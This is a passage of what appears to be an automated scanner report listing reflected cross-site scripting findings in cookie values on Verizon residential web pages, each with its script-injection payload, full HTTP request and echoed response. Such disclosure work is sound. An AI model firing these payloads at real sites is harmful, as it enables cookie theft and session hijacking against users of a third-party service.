Host:	http://www22.verizon.com
Path:	/Residential/WiFi/

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 59255<script>alert(1)</script>d6b028c213b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/WiFi/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX59255<script>alert(1)</script>d6b028c213b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72108
Expires: Mon, 13 Dec 2010 01:00:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:00:24 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:00:23 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:24 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 01:00:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX59255<SCRIPT>ALERT(1)</SCRIPT>D6B028C213B </DIV>
...[SNIP]...

1.109. http://www22.verizon.com/Residential/aboutFiOS/Overview.aspx [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.aspx

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e085a"-alert(1)-"b57e3962a95 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/Overview.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; SMSESSION=LOGGEDOFF; amlbcookie=02; BTagRequired=N; showpromo=Y; vzpers=STATE=TX; refURL=https://www22.verizon.com/myverizon/?goto=https://www22.verizon.com:443/ForYourHome/MyAccount/Protected/Services/MyServices.aspx; dotcomsid=e085a"-alert(1)-"b57e3962a95; ContextInfo_LoginStatus=LoggedOut; canigetfios=Y; ASPSESSIONIDSSSCQRRB=BOCIPHNDBILEDOLNLLENIOIM; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; ContextInfo_Partner=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; BusinessUnit=business; autosuggest=on; ASPSESSIONIDCARDDBQC=PKALHINCLCFABDAMOEKKIJOM; V347=0; PDSS=PflowId=59d1fd23c98a4183a130929a9591e880; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc65d45525d5f4f58455e445a4a423660; VZGEO=west; ASP.NET_SessionId=y0dhtevok4wp3q555bgrlq45; ak-sf=false; RegistrationApp=SessionId=97f661ab-aee6-4f56-a697-5017b1150c73; CMS_TimeZoneOffset=360; vzapps=STATE=TX; ASPSESSIONIDQCRQQSAR=GJAMFOBBLDFMDHPEIONJIBNJ; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; VzApps=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; ContextInfo_State=; Source=CHSI; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6cd45525d5f4f58455e445a4a423660; ContextInfo_ZipCode=-; CP=null*; DSS=flowId=8644a0aeb63d475197c3efd56bcb6f16;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75980
Expires: Mon, 13 Dec 2010 01:07:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:07:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:45 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:46 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 01:07:46 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
and High-Speed Internet Features | About FiOS','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "e085a"-alert(1)-"b57e3962a95"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.110. http://www22.verizon.com/Residential/aboutFiOS/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 1d99d<script>alert(1)</script>ac00a6cdf76 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71006
Expires: Mon, 13 Dec 2010 00:40:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:37 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:37 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:37 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:37 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1D99D<SCRIPT>ALERT(1)</SCRIPT>AC00A6CDF76 </DIV>
...[SNIP]...

1.111. http://www22.verizon.com/Residential/aboutFiOS/Overview.aspx [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.aspx

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5079'><script>alert(1)</script>eca1b129867 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71010
Expires: Mon, 13 Dec 2010 00:40:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:40:37 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:40:36 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF5079'><SCRIPT>ALERT(1)</SCRIPT>ECA1B129867 ' />
...[SNIP]...

1.112. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eefca'><script>alert(1)</script>5cd5331fa6b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXeefca'><script>alert(1)</script>5cd5331fa6b; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; CMS_TimeZoneOffset=360; RVServiceLocation=TX; ContextInfo_State=TX; BTagRequired=N; CP=null*; refURL=http://www22.verizon.com/residentialhelp/

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71008
Expires: Mon, 13 Dec 2010 00:47:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:47:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:47:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:01 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:01 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:52:01 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEEFCA'><SCRIPT>ALERT(1)</SCRIPT>5CD5331FA6B ' />
...[SNIP]...

1.113. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload c8da8<script>alert(1)</script>d5e60e10ffc was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; vzpers=STATE=TXc8da8<script>alert(1)</script>d5e60e10ffc; canigetfios=Y; showpromo=N; vsrecentsearches=%26%2339%3b~~~~; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; BusinessUnit=residential; CMS_TimeZoneOffset=360; RVServiceLocation=TX; ContextInfo_State=TX; BTagRequired=N; CP=null*; refURL=http://www22.verizon.com/residentialhelp/

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71004
Expires: Mon, 13 Dec 2010 00:47:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:47:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:47:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Sun, 12-Dec-2010 00:47:03 GMT; path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 00:52:03 GMT; path=/residential/; domain=verizon.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXC8DA8<SCRIPT>ALERT(1)</SCRIPT>D5E60E10FFC </DIV>
...[SNIP]...

1.114. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 2b497<script>alert(1)</script>9d9159b676b was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX2b497<script>alert(1)</script>9d9159b676b; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78200
Expires: Mon, 13 Dec 2010 00:48:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:48:34 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:48:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:34 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:34 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX2B497<SCRIPT>ALERT(1)</SCRIPT>9D9159B676B </DIV>
...[SNIP]...

1.115. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b917e'><script>alert(1)</script>6e29c101aed was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXb917e'><script>alert(1)</script>6e29c101aed; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78204
Expires: Mon, 13 Dec 2010 00:48:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:48:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:48:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:30 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:48:30 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB917E'><SCRIPT>ALERT(1)</SCRIPT>6E29C101AED ' />
...[SNIP]...

1.116. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzpers cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dfc3d'><script>alert(1)</script>9c26e76d6bf was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TXdfc3d'><script>alert(1)</script>9c26e76d6bf; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73830
Expires: Mon, 13 Dec 2010 00:49:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:49:01 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:49:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:00 GMT; path=/
Set-Cookie: ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; expires=Sun, 12-Dec-2010 00:49:00 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDFC3D'><SCRIPT>ALERT(1)</SCRIPT>9C26E76D6BF ' />
...[SNIP]...

1.117. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzpers cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzpers cookie is copied into the HTML document as plain text between tags. The payload 19da6<script>alert(1)</script>ab7f85e6843 was submitted in the vzpers cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX19da6<script>alert(1)</script>ab7f85e6843; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73826
Expires: Mon, 13 Dec 2010 00:49:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:49:05 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Sun, 12-Dec-2010 00:49:05 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
Set-Cookie: BTagRequired=N; domain=.verizon.com; path=/
